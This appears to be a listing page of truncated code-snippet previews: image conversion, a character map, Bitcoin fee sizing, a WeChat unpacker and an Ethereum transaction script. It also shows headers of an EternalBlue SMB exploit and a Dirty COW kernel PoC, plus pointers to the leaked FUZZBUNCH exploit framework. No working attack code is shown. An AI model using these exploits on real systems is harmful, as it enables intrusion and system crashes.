| <?php | |
| //php gd-gif.php image.gif gd-image.gif | |
| $gif = imagecreatefromgif($argv[1]); | |
| imagegif($gif, $argv[2]); | |
| imagedestroy($gif); | |
| ?> |
| { | |
| "卧": "臣卜", | |
| "项": "工页", | |
| "功": "工力", | |
| "攻": "工攵", | |
| "荆": "茾刂", | |
| "邪": "牙阝", | |
| "雅": "牙隹", | |
| "期": "其月", | |
| "欺": "其欠", |
| // Usage: | |
| // getByteCount({'MULTISIG-P2SH:2-4':45},{'P2PKH':1}) Means "45 inputs of P2SH Multisig and 1 output of P2PKH" | |
| // getByteCount({'P2PKH':1,'MULTISIG-P2SH:2-3':2},{'P2PKH':2}) means "1 P2PKH input and 2 Multisig P2SH (2 of 3) inputs along with 2 P2PKH outputs" | |
| function getByteCount(inputs, outputs) { | |
| var totalWeight = 0 | |
| var hasWitness = false | |
| var inputCount = 0 | |
| var outputCount = 0 | |
| // assumes compressed pubkeys in all cases. | |
| var types = { |
| #!/usr/bin/env python2 | |
| # lrdcq | |
| # usage python2 unwxapkg.py filename | |
| import sys, os | |
| import struct | |
| class WxapkgFile(object): | |
| nameLen = 0 |
| const Web3 = require('web3') | |
| const Tx = require('ethereumjs-tx').Transaction | |
| // connect to Infura node | |
| const web3 = new Web3(new Web3.providers.HttpProvider('https://mainnet.infura.io/INFURA_KEY')) | |
| // the address that will send the test transaction | |
| const addressFrom = '0x1889EF49cDBaad420EB4D6f04066CA4093088Bbd' | |
| const privateKey = new Buffer('PRIVATE_KEY', 'hex') |
| #!/usr/bin/python | |
| # This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
| from impacket import smb | |
| from struct import pack | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 7/2008 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
| #!/bin/bash | |
| sourcefile=$1 | |
| destfile=$2 | |
| # Overly simple validation | |
| if [ ! -e "$sourcefile" ]; then | |
| echo 'Please provide an existing input file.' | |
| exit | |
| fi |
credit: @GossiTheDog: "If you want to setup FUZZBUNCH (the Equation exploit framework) you need Win7 VM + Python 2.6 + Pywin 2.6, then python fb.py for shell"
h/t @x0rz @DEYCrypt @hackerfantastic
context: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
writeup: https://www.trustedsec.com/blog/equation-group-dump-analysis-full-rce-win7-fully-patched-cobalt-strike/
decrypted files: https://github.com/x0rz/EQGRP_Lost_in_Translation
| (module | |
| (func $addTwo (param i32 i32) (result i32) | |
| (i32.add | |
| (get_local 0) | |
| (get_local 1))) | |
| (export "addTwo" (func $addTwo))) |
| /* | |
| * CVE-2016-5195 dirtypoc | |
| * | |
| * This PoC is memory only and doesn't write anything on the filesystem. | |
| * /!\ Beware, it triggers a kernel crash a few minutes. | |
| * | |
| * gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread | |
| */ | |
| #define _GNU_SOURCE |
